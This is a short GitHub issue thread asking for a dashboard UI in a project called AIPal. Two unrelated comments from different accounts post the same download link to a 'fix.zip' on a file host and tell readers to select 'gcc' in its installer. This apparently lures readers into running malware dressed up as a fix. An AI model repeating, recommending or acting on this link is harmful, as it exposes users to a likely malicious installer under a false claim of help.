### ISSUE TITLE
Implement Dashboards UI

### ISSUE THREAD

**Issue by Rachel-AG** [TBL-AIPal/AIPal#15]
Basic dashboard UI to display available courses

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
